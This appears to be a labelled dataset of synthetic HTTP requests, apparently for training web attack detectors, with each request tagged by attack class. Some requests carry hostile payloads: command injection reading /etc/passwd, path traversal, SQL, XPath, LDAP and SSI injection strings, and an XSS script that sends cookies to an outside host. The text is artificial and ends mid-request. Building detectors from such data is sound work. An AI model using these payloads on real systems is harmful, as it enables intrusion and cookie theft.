GET /cVJHM23LdRlR/pEXnK3.GISc2LUy/BwhereGvb/skIudT/3e5eastftT2/wtaEoehheoe/aNIq2C7BOYm/uplfitrx8o9alaic/adc9sne.cfm? HTTP/1.0
Host: www.snofu6waf6.cz:781
Connection: nejow
Accept: audio/basic;q=0.8, video/mpeg;q=0.6
Accept-Charset: windows-1251;q=0.2, euc-tw, koi8-r, x-mac-japanese, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: eas-srotfavr;q=0.0
Cache-Control: no-cache
Client-ip: 212.54.201.4
Cookie: 9uo0=../../../../../../../../../WINDOWS/autoexec.bat
Cookie2: $Version="6"
Date: Thu, 27 Mar 08 20:53:08 UTC
ETag: "uLxITG0Xh_--WJl9sI4"
Expect: 06bu
If-Modified-Since: Sun, 24 Aug 08 20:06:18 GMT
If-Unmodified-Since: Wed, 06 Dec 06 10:25:40 GMT
If-Match: *
If-None-Match: *
If-Range: "h-m_4S6tltzOiAOGn"
Max-Forwards: 773
Pragma: rtoltgi='eojctr'
Proxy-Authorization: Digest response="793A8bCE0CAdf24bBc6AF425F082f32a"
Authorization: Digest algorithm=fdnsa
Range: 674-
Referer: http://www.tH0eerl.fr/m1Ohwam/rsteowr.jsp
TE: trailers,trailers
User-Agent: aquW8M http://www.e6bru.be
UA-CPU: x86
UA-Disp: 2781,460,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6710x724
Via: FTP/4.8 187.180.84.193, 0.8 40.236.26.12
Transfer-Encoding: deflate
Upgrade: rnie/5.1, Tob3to/6.1, sna9re/2.7, noa/6.3, moetu/9.8
Warning: 070 248.147.23.161:680 "AanaRtuucm" 
X-Serial-Number: 838229
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45325
Start - Id: 48163
class: XSS
GET /52a7a9bzitarag6o5u/Nr6ptarjylHti/mXQjt0lT-uq/eitiadctiihgo8.htm?iTobstevoaznnot=98&5fqjnxtermiI=Tnvaatp2ssbstnOah&6iRoir=i&tnyrlus=470&yiekacA=uDvr++drop2+6&8eslat=r&odb=38238&ey6pvsEt6wkYm=%3Cimg++++src++++%3D++%22++mocha%3A%5Balert+%28%27eEma%27%29%3B%5D%22+%3E&HOd.6eSTIdvy=211942&fdp=gL5Xs%40%40 HTTP/1.1
Host: 202.184.115.177:80
Connection: close
Accept: application/*, application/postscript
Accept-Charset: hz-gb-2312, gb2312
Accept-Encoding: deflate, identity;q=0.9, deflate;q=0.8, deflate
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 211.190.214.99
Cookie: toleteeo6dn9Ei4=dectgAgs;BUwXoaccess_logfEsystemO=?th em'$hud2;ooshgihh=t3t @Btvbscript;hooaiilnmvgjob4=50
Cookie2: $Version="6"
Date: Sat, 20 Aug 05 10:44:11 UTC
ETag: W/"KTjmOB4QF.aHd_v"
Expect: 100-continue
From: sfatroh@4tt9delj7a.org
If-Modified-Since: Wed, 03 Nov 04 03:30:58 UTC
If-Unmodified-Since: Mon, 05 Feb 07 10:14:09 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 928
MIME-Version: 7.0
Pragma: pmenv=t
Authorization: NTLM dHJrZWRhZDlzZXR5b2VlYWJUSm1sZHNRbXRpaG5ldG5sbG90
Range: 248-
Referer: http://www.f1i9tlna.de/rper/ciTHeeen.php3
TE: gzip,gzip;q=0.9
Trailer: If-Range
User-Agent: Mozilla/3.6 (Machintosh; U; Mac OS X 5.1; ej-sF; rv:8.3.3) Gecko/65103667
UA-CPU: MIPS
UA-Disp: 472,3569,8
UA-OS: Win98
UA-Color: color16
Via: Xtp/2.8 68.47.189.195, FTP/8.0 106.168.39.64
Transfer-Encoding: grg3ro
Warning: 469 www.eeshc.gif:6 "8tbhssqusptoj" 
X-Forwarded-For: 129.132.255.71
X-Serial-Number: 532844106814003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48163
Start - Id: 43150
class: OsCommanding
GET /mtahtezo/8xg4Y/w0C0LA.9wEApa.htm?Neamanxri=cat++%2Fetc%2Fpasswd+++%7C HTTP/1.1
Host: www.jkslS.ch
Connection: keep-alive
Accept: text/xml;q=0.0
Accept-Charset: iso-8859-2, x-mac-hebrew;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=80177
Client-ip: 66.158.131.150
Cookie: ZgH15j3d=wOo
Cookie2: $Version="03"
Date: Sun, 23 Mar 08 09:28:23 UTC
ETag: "8Si792-o4C3zcdKh6"
Expect: tvNyv
From: riAeyrh@tgaMea.st
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Wed, 21 Oct 09 02:29:17 UTC
If-Match: *
If-None-Match: "mhjSf-DRCZu.Wxk.J5"
If-Range: "Dr1UN7YVdxvt-oIEZ_i"
Max-Forwards: 47
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM bW9lbndtb250NGE5ZHRscnhuYTI2ZGRyMlNjc2x0cmhGTg==
Authorization: Basic MlVzaGhyOmJyZWlp
Range: 46359-,93372-15,76-
Referer: /gyeki/rHptrlfC.dll
TE: deflate;q=0.0,gzip,gzip
Trailer: Host
User-Agent: Mozilla/9.3 (Machintosh; U; PPC 0.4; ee-ed; rv:3.6.2) Gecko/99669606
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x046
Via: HTTP/6.9 0.51.39.219, jhtk/3.7 103.60.190.91
Transfer-Encoding: gzip
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43150
Start - Id: 48574
class: XPathInjection
PUT /tzlahra4i.exe? HTTP/1.1
Content-Length: 217
Content-Language: taeh,coe4uar
Content-Encoding: deflate
Content-Location: http://t8baAn.fr/92ivre/yD11Enar/heon/lszfu3.msf
Content-MD5: dWJ0RW5DaGxudGNkZHRpZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 May 08 04:41:31 CET
Last-Modified: Sun, 11 May 08 21:32:25 CET
Host: www.tksoEh.gov:80
Connection: smtqeei
Accept: audio/x-wav;q=0.1, image/jpeg, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=2171
Client-ip: 5.57.77.191
Cookie: Snnq0sqhai5yne=i0RX;sm6Mrsoqyooe4=d@K_;o4ohcp=\? tf;ceoehoUhs6e=t$ai%mrnmburxuh ioD;Tasfrzx=jbeasts4jr:9
Cookie2: $Version="47"
Date: Sat, 27 Jan 07 04:40:32 CET
ETag: "GSCXoNh2vkhzld6.WL"
Expect: iJvsn=ronjlII
From: tatnungw@cltshcrl.be
If-Modified-Since: Thu, 19 Nov 09 06:23:42 GMT
If-Unmodified-Since: Sat, 21 Jul 07 05:23:20 UTC
If-Match: "EezgoY@xNeRCtugFgwNI"
If-None-Match: *
If-Range: "r64cO8RzAY-lxMI2s7kl"
Max-Forwards: 260
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic NGFpOXJ1OGw6cnR0aHRncg==
Authorization: Digest qop=auth-int
Range: 9027-,6479-,26031-
Referer: /eiuegr/espr6yca/omew/nmsa.asmx
TE: deflate;q=0.1
Trailer: Date
User-Agent: Mozilla/8.4 (Machintosh; U; PPC Mac OS X 5.9; co-st; rv:6.9.7) Gecko/87328555
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 316x0903
Via: HTTP/4.0 www.iynhoepn.jpg, FTP/1.9 www.Tomtrjy.gif, HTTP/2.7 53.239.190.128:3965
Transfer-Encoding: identity
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 024 102.167.137.67 "nvpacNsesceoTbreyoUd" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

4ebgenOtesd=@es0d3io1a&ffl=ee2eRroxi;cDurtEs&TCgXwmK6e_=)g&uxtrdNa=132061&bvyg4=esdrtk&eks=0864 or  3i/o/1d3/child::node()[position()=534]     or 0=&q3eudewm=sr67@tnb0a&dcat8kyw=20488

End - Id: 48574
Start - Id: 49131
class: XPathInjection
GET /con3ckrkiOic.asmx?oinrutavsef8m=img&psbinIxq2sRpVKa=ps%27tssbawo&tY3zgeVtidsbnml=8rma+a0dt&Qo=teiw6gmrtaerT&9slwnandttteYnt=hxiWeliEeSmnsosz&edeo=oSE-4N&i0ooo=wp%2Frodh%2Ftwevn%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D29%5D++++or+%27cor%27++%3D+%27&sEgp=7rqw.nQJt_m&e1no9=21169&r8det9ledeexs=nMeihttpse6Hrddt&rratCugEryoil=%3Dle&pjov=136535956&qmieyh80vienz=fetn2wdFeegnenqSnd&kmetahavingT=652 HTTP/1.1
Host: 152.194.48.55
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8;q=0.1, iso-2022-jp;q=0.8
Accept-Encoding: compress;q=0.6, identity, identity
Accept-Language: *;q=0.0
Cache-Control: oqf='r'
Client-ip: 63.41.96.252
Cookie: i99xrQw=wqsaunph-&irdelete;nel4cmda8;se6ipwoox4meoK=489;osyosOEt50lytq=nhev
Cookie2: $Version="860"
Date: Wed, 05 Sep 07 15:10:20 CET
ETag: W/"Tvi9KhEHOu0-YyM"
Expect: 100-continue
From: NktwIe@earsOsuo.org
If-Modified-Since: Sun, 08 Jan 06 05:00:50 GMT
If-Unmodified-Since: Wed, 23 Jun 04 17:39:39 UTC
If-Match: "8381p5QNphbGnxUvL"
If-None-Match: "3gGsHEizp5o84lx.mIAm"
If-Range: *
Max-Forwards: 87
MIME-Version: 1.0
Pragma: am=adoyoe
Proxy-Authorization: Basic YWFpZDpkYW90YW5q
Authorization: Basic MGVCSWVvUHA6aWhoYWQ=
Range: 6-
Referer: /itAeo9/hDHeru/bybiiah/u8ne/d7ei.tar
TE: gzip;q=0.4,deflate
Trailer: Host
User-Agent: gzop5o (10WECQPD)
UA-CPU: MIPS
UA-Disp: 3801,296,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 793x723
Via: FTP/2.8 www.h5rdW.html, 5.1 www.ardt5s.html:60008
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49131
Start - Id: 42020
class: SqlInjection
GET /nSnlesoodc5phtoas/3eAwrisjt/kfSKj.k8RBE/oxUZaY/giduebtyuetf7.php?ia2artisodi=zzqPuJRFh&il3=%27+++++UNION++++++++++ALL++++++++++++++SELECT+++nihiymta5+++FROM+++0s++++WHERE++%27%27++%3D+++%27&ShQFpsw9glsK=%3Dbn%3C+ HTTP/1.0
Host: 11.164.196.60:6278
Connection: sxmyRxe
Accept: image/gif, audio/basic;q=0.0
Accept-Charset: utf-8;q=0.6, windows-1258, windows-1252;q=0.4, shift_jis;q=0.3, us-ascii;q=0.7
Accept-Encoding: deflate, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 144.52.64.113
Cookie: ldeeptxIH=va;-3YJmpr_=q;position9zTgCzW5=877
Cookie2: $Version="334"
Date: Tue, 03 Nov 09 02:27:01 GMT
ETag: "RNqO_dyGb@AGbsbMlT4j"
Expect: ouiSlPr
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Fri, 24 Feb 06 05:09:41 GMT
If-Unmodified-Since: Thu, 15 Jan 09 10:48:56 CET
If-Match: "Grhx@b@7p0VR3nv"
If-None-Match: "ET5za89pIK5.DkzGsT6V"
If-Range: Tue, 15 Sep 09 08:35:11 GMT
Max-Forwards: 0
MIME-Version: 9.3
Pragma: ali7k=sesm16
Proxy-Authorization: iaijaB rjera=cnidom
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: /Mgbaot/nAt2sizl/7citrn.pdf
TE: trailers,gzip;q=0.0
Trailer: Date
User-Agent: Hkit/4.6
UA-CPU: 68000
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: 3.8 www.vosanao.shtml, HTTP/8.3 67.80.237.123
Transfer-Encoding: ncge6; mb73t3n=nUkss
Upgrade: 1ra/6.0, 2yNai/3.3, a1ejc/1.5, osRwie/7.4, e6bte/5.7
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42020
Start - Id: 40763
class: SSI
PUT /oH2.HJYKznGwZJ2Sqtl/yzixterm-B.css? HTTP/1.0
Content-Length: 326
Content-Language: he0
Content-Encoding: gzip
Content-Location: http://www.ddoO.uk/6iSWtsw/anut/ehtdtn/euhsi/cep3oct.tar
Content-MD5: cTI4c25pcmxlc3RjZGdybw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Feb 04 12:58:49 CET
Last-Modified: Mon, 29 Jun 09 05:43:41 GMT
Host: www.lnt6b.it:20
Connection: close
Accept: video/*, video/*, video/mpeg;q=0.3
Accept-Charset: gb2312, iso-8859-8-i, windows-1257;q=0.1
Accept-Encoding: identity;q=0.5
Accept-Language: *;q=0.5
Cache-Control: max-stale=3
Client-ip: 166.41.33.129
Cookie: ipe9Jm3=112815;NZn=pmeiss;Aeernepfae=tdsbajv2Dd 
Cookie2: $Version="05"
Date: Thu, 13 Sep 07 13:03:51 CET
ETag: "-mDaC72APAXSOUm"
Expect: rmaeE=isllts;rfnemmn
From: tt33en@1osNNfn.biz
If-Modified-Since: Tue, 11 Dec 07 05:32:55 UTC
If-Unmodified-Since: Sun, 10 May 09 07:45:20 CET
If-Match: *
If-None-Match: "WDxPOFAZtE-6VDudY"
If-Range: Sat, 21 Oct 06 10:13:07 GMT
Max-Forwards: 2
MIME-Version: 8.0
Pragma: rse='8'
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: NTLM bW81ZXNuOG9oZWVhdm9JaWFyYVNlb2lpbHJodGdsd2xoZGk0dXRyYWVvZHlh
Range: 21211-
Referer: http://vnRooF7.st/aiadgo/8cdfh/yNosAt/ilJSi/9if4q.bin
TE: trailers,chunked;q=0.4
Trailer: Date
User-Agent: ZoisTu3afrn5r
UA-CPU: 68000
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: 3.3 52.26.160.47:7, 8.3 www.icuTqst.shtml, 6.4 www.IbuaLe.css
Transfer-Encoding: compress
Upgrade: llpms/3.8, ooqW/1.4, caoE7l/5.8, OoitA/7.6
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

dnl=efd&guia2iElyidaona=428&omcsrca5=<!--  #odbc  statement = "select     Heshek,     6Dhhttll,     riczsois from he9addm  order by     7,   830,   1"  -->&sw=pOquMSf&RgKnodeGKVEUexecc=13&7toaqH=6ZKbC1&endnHbwk16siars=74310&Mhp5APSLSoU=m oa&oF@0D@Oexecysp=4491201&osc=28582025&548rllocationfI=egp>I@r

End - Id: 40763
Start - Id: 36674
class: OsCommanding
GET /zubsjW/e_Pj/setuc4t/79DeTuv7z73.png? HTTP/1.1
Host: www.rneetjcroe.com:80
Connection: close
Accept: audio/*;q=0.0
Accept-Charset: iso-8859-6;q=0.3, x-mac-japanese, iso-8859-9;q=0.7, x-mac-korean, utf-8
Accept-Encoding: |   cat    ../../../../../../../etc/passwd    |
Accept-Language: 4op-dsrlErl;q=0.7, hteatwr-lchd
Cache-Control: no-transform
Client-ip: 14.224.231.96
Cookie: iy2tat=7;tSt7gnpaci9tns=zDYgK3Bs9;boot.iniSetclochildt-9=9T8kbes9;dLpU8soU=)o9nn
Cookie2: $Version="4"
Date: Wed, 01 Jul 09 17:25:40 CET
From: e3ciy@eehmhnotl.be
If-Modified-Since: Wed, 20 Jul 05 10:19:52 GMT
If-Unmodified-Since: Tue, 04 Jul 06 06:48:36 GMT
If-Match: "9@pX57CchNp9si1QCv0"
If-None-Match: *
Max-Forwards: 9
MIME-Version: 5.4
Pragma: ssah6=onewgsm
Range: 50-4,41661-
Referer: http://citynel.org/iee8te/ehta/sterRid/sb5sGrn.dll
TE: trailers,deflate;q=0.8,chunked;q=0.9
Trailer: If-Match
User-Agent: Mozilla/1.0 (X11; U; Open BSD i586 6.0; ef-td; rv:8.2.7) Gecko/43081012
UA-OS: FreeBSD
UA-Pixels: 211x4085
Via: 3.2 www.iueo.jpeg:7, sjtdii/1.8 www.mey5ekob.htm
Transfer-Encoding: deflate
Upgrade: k21de0/3.9, tcu/7.2, 6go/7.9, sirla/2.0, elb/6.0
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36674
Start - Id: 38674
class: LdapInjection
GET /nP@E-WJ/o0ofzNo8kWnesf9/7cB5_r6jU.png?oUoMHwsI=ta%29%28%26%28objectClass%3D++ot*%29&SieOna=u6ytt4eveWfem&rpsihs=yhlW HTTP/1.0
Host: www.rmiitkue.net:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-15;q=0.6, x-mac-arabic, windows-1257;q=0.5, utf-7
Accept-Encoding: *;q=0.9
Accept-Language: ul-tt6tm, 5sea-cbnose;q=0.6
Cache-Control: an7nnij='sDHi9h'
Client-ip: 64.190.230.209
Cookie: tiiOt7hcr=ee\liwgetm)/tcmtogt;RYo2efhanA=461185629;9l=21277884;nldieiznc==delete7ilriah;t7eaeino=hs
Cookie2: $Version="053"
Date: Fri, 20 Jul 07 17:04:07 CET
ETag: W/"_hqGMwYxMtSHJo_E"
Expect: eees1
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 20 Jun 04 01:43:01 UTC
If-Unmodified-Since: Wed, 18 Jul 07 10:11:28 CET
If-Match: *
If-None-Match: "t1BpX@2ZoM.g3rkLIR0"
If-Range: *
Max-Forwards: 1898
MIME-Version: 5.8
Pragma: rehfi5='bn'
Proxy-Authorization: Basic ZTNpZGlzYzp0czFtb2VmYw==
Authorization: Basic ZHVlZTM0aG06ZnM4b2g=
Range: 39622-,-9614,-81153
Referer: /Ti1yh38p/elzooc/2naeh/tSeicea.css
TE: chunked;q=0.0
Trailer: Accept
User-Agent: eKaJMVBn http://www.abaIgs.biz
UA-Disp: 0550,3953,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7709x7356
Via: 0ttldx/8.5 www.nbas.gif:67, ieboyl/1.3 www.gaetbtv.css:0266, FTP/9.6 119.211.27.200
Transfer-Encoding: compress
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 336 54.31.98.146 "tnyvIt9cmjd" "Tue, 01 Nov 05 06:51:51 UTC"
X-Forwarded-For: 0.228.238.16
X-Serial-Number: 4169159
----: -------------------

null

End - Id: 38674
Start - Id: 40725
class: SSI
GET /4hMxXe53u1s3AU/mrK0g.fPoWbJEtRT/gbrG3f8v4deHImD.js?dh=8207242&ahnom=cdepbmmrpan&hT8r=iSkbgsound&sYe4ThSiAl6=6786&oSgicw=oTUsTElX&UB6gxWot10Y=7094671793&neulIith0nts=070&YX69z9@49QHA=t+eOaertsock_stream&3dhogwepoadn=0&prw=8 HTTP/1.0
Host: 224.21.2.51
Connection: keep-alive
Accept: application/*;q=0.6
Accept-Charset: iso-2022-kr;q=0.0, x-mac-chinesetrad;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: <!--  #odbc  connect="1le,otEn,nTuws"    statement="select    *   from ob"-->
Cache-Control: no-transform
Client-ip: 87.193.44.132
Cookie: h0=9;@.NFhEN2=5;g.3YZGClike=rmej(httpbn;nunswtz=attruneemu
Date: Mon, 12 Jan 04 01:59:45 GMT
Expect: ae7na=u0tnylko
If-Unmodified-Since: Sun, 18 Jul 04 04:40:39 GMT
If-Range: *
Max-Forwards: 3368
Pragma: roomagi=z
Proxy-Authorization: Basic U3VhY2lzb0U6aXdzbg==
Authorization: Digest nc=8Ed3D2a9
Referer: http://www.t5oh5max.it/syceeee/IaiewoaH.gif
User-Agent: Menhontl (tuv08HD6UC)
UA-Pixels: 665x5598
Via: HTTP/2.6 114.248.35.202, 1.4 www.9aevF.css:9025
Transfer-Encoding: AcfgnC; arae=eols
Upgrade: tnhbcr/4.1, jltoS/5.7, hnntni/0.8, kjr8nt/5.2
Warning: 061 117.197.195.92 "w4cretoaprhCflkM" "Tue, 16 Oct 07 06:45:57 CET"
----: ---------------------

null

End - Id: 40725
Start - Id: 42428
class: SqlInjection
GET /qq3.Gv-/hXyLT7F-/6AWZgcW8P14execS/iM/tyKqh7uhx/5gO9AWKrKlLcIesw/YBuphoIEXxtermSxcatd/replaceZDfMCRDn6iW/o22GbGxczLiTUJ/sd7g7Snabc/dZ@j/sHmltcRueoheeatr5g.css?teadtRhol=%27++++%2F**%2F++++OR++%2F**%2F+++++%27agi%27++%3E+%27S HTTP/1.0
Host: www.rfhyAfrE.be
Connection: keep-alive
Accept: audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 28.141.41.185
Cookie: isisrol9dtOtn=insertr;inXgsLeersda7=lgA7tWhR1d;etrfsknn=9576148;dNHHb0mesbae=jedephedas;Uawhere_group bygselectLPEf-=7;ct=98398
Cookie2: $Version="2"
Date: Fri, 06 Oct 06 04:15:48 GMT
ETag: W/"ROs81ENXsNKrraDFF"
Expect: ctja
From: ein6@dloaflHo.biz
If-Modified-Since: Tue, 26 Aug 08 24:53:27 GMT
If-Unmodified-Since: Sat, 05 Sep 09 22:55:30 UTC
If-Match: "Asx8P9sbgCYJnT."
If-None-Match: "gXheTBCAIWNh3EkZ6"
If-Range: Fri, 06 Jun 08 16:55:49 CET
Max-Forwards: 958
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: NTLM QWVjdHRpUmU4cm9Mc3Zlc3RIZW9JZWYxM3N0bGVlbmdhYnNF
Range: 005696-6624,4-
Referer: http://www.sdrjr.cz/8Tnmm/vzel/ri6nI/iotve/sneixkrt.png
TE: gzip;q=0.9,chunked,deflate;q=0.6
Trailer: If-None-Match
User-Agent: Mozilla/3.7 (X11; U; Unix 7.6; J7-yc; rv:9.9.8) Gecko/89685055
UA-CPU: 68000
UA-Disp: 9195,5329,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: FTP/5.2 www.feii9i.jpg, Lelid/6.1 70.167.48.162:010
Transfer-Encoding: eseqa
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 781 102.8.11.215 "Yhee38R7lileIanstkb" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42428
Start - Id: 45246
class: PathTransversal
GET ////? HTTP/1.0
Host: www.Zdtnfr.net
Connection: Dnlprte
Accept: application/rtf;q=0.1, video/mpeg;q=0.5, image/jpeg;q=0.9
Accept-Charset: big5;q=0.4, x-mac-chinesesimp;q=0.7, hz-gb-2312;q=0.3, utf-7, x-mac-japanese
Accept-Encoding: deflate
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 172.49.251.232
Cookie: Tcoqa=Trsbkvseuu;krbruSehmanqdo=et6 ;eitx4D=gfedtrns;nERtxIr=eu81e@
Cookie2: $Version="58"
Date: Mon, 13 Dec 04 24:40:14 GMT
ETag: W/"TC1C.R6SZLoWaRYE"
Expect: nT6mf=6igw
From: pdeOseO@dTeieho.org
If-Modified-Since: Mon, 26 Apr 10 02:37:03 UTC
If-Unmodified-Since: Sun, 24 Aug 08 01:00:19 CET
If-Match: *
If-None-Match: "Wh09e26zYoUqMEo"
If-Range: Sun, 25 Jan 09 09:28:44 UTC
Max-Forwards: 734
MIME-Version: 1.7
Pragma: e2afl='nmu'
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM bWVzdG1zdHJzZWFhYXlkaG9JZjZ2a2c3dG9sYWluMm5UYzJvbw==
Range: 220-5761,42620-
Referer: http://mdufaiue.be/aouheiGt/rirolXs/eroaoo/aohn/Eettt.jpeg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.3 (compatible; Konqueror/1.9; Windows NT; h3ialiie; i0leefs2m; 9ocd2itv)
UA-CPU: x86
UA-Disp: 568,3282,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: HTTP/4.1 235.151.203.81, szO/2.2 www.oltsih.tiff, 0.4 www.ltnbesen.htm
Transfer-Encoding: compress
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 67855229
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45246
Start - Id: 46800
class: XSS
PUT /iY7KQZ0QKP/Lsmoastisgt9/ntecosset5e.exe? HTTP/1.0
Content-Length: 342
Content-Language: deco,tnnie,yi59t
Content-Encoding: compress
Content-Location: /uloghseu/heth.txt
Content-MD5: ZWFyeXJwZXJpcTF0aXlwYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Mar 07 17:55:29 GMT
Last-Modified: Fri, 04 Jul 08 15:15:09 GMT
Host: www.N7biHd.net
Connection: close
Accept: */*
Accept-Charset: windows-1251, iso-2022-jp, windows-1251, macintosh, hz-gb-2312;q=0.1
Accept-Encoding: identity;q=0.7, gzip;q=0.5, identity, compress
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 163.182.220.152
Cookie: r.JBkz1_G-Q=o.lVYEW;O7LlWR=rorrOnt;d6e=%
Cookie2: $Version="55"
Date: Sat, 10 Nov 07 07:45:37 UTC
ETag: "zdWaUN_28hOSe2q66Mv"
Expect: o6sRe3
From: rrxr@antg6tman.st
If-Modified-Since: Wed, 28 Oct 09 08:31:11 CET
If-Unmodified-Since: Tue, 14 Nov 06 16:51:08 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Dec 05 19:10:32 GMT
Max-Forwards: 7
MIME-Version: 8.1
Pragma: my='datn'
Proxy-Authorization: Basic RDBlQWk6ZWloNg==
Authorization: Digest algorithm=MD5-sess
Range: 15-86
Referer: /rgis2tc/iwrpQs.php4
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: adl0a5Hte/6.8.8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 818x5674
Via: 2.5 64.74.41.231, FTP/3.7 www.erecoa.htm, coli/5.6 185.118.118.60
Transfer-Encoding: uyqu; rjvr=yed1
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

aaaonsl=bo tdlnneiframe&xfromTpkue=<style   ><!--</style  ><script >[document.location.replace   ('http://www.maalri.com/cgi-bin/lira.cgi'+document.cookie);]//--></script    >&lhhnt3Epdofd=sE8uGXzg&lrddi8=16529930&eea=gE&xntysoarer=67064357&Dehaimoyu0=8&fnfu=nf&imUi6ne=nTi.ax&lTtet6=mr

End - Id: 46800
Start - Id: 43043
class: OsCommanding
PUT /5vc36WTKg/8GYMftelnet8PBY/nrpodaosoNrI/hzn/sstqmtpeniGd/d9oe3olnsaavojas/o2scV8@2NmrGdBQ.php? HTTP/1.0
Content-Length: 265
Content-Language: nas,rWw
Content-Encoding: compress
Content-Location: /meqtgr4q.asmx
Content-MD5: bnRodXM1dGluNnVudXBlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jan 04 12:46:30 UTC
Last-Modified: Fri, 13 Aug 04 05:26:04 CET
Host: www.fAdr.ch
Connection: lmtssaua
Accept: audio/basic, video/mpeg
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.0, compress
Accept-Language: nrO-ewieeg5;q=0.6, dsiet-tw1ennsd, osowa-teepiqi, ki-cania1;q=0.9
Cache-Control: no-store
Client-ip: 121.29.110.84
Cookie: 5ZZ9N8=wlDega1dodh1r;e3uwnmlanaglj=oedt1;atshtE=ei3arsteirttQit;eudnebtps3gx=nuoo
Cookie2: $Version="447"
Date: Sun, 22 Mar 09 04:16:15 CET
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: a0ee@enelreh.it
If-Modified-Since: Tue, 22 May 07 22:09:41 GMT
If-Unmodified-Since: Mon, 24 Nov 08 06:12:27 CET
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: "9ZeuzdNhr24f44h"
If-Range: "QpOElv88Hp3DgAg9E"
Max-Forwards: 78
Pragma: 17BRynI=sEn8ex
Proxy-Authorization: titoh aivw=aonsbe
Authorization: Digest algorithm=p6ieY9
Range: -98633,070828-,-9277
Referer: /meom/sbt8t/nIRR7y/iePm.js
TE: trailers,trailers,deflate;q=0.0
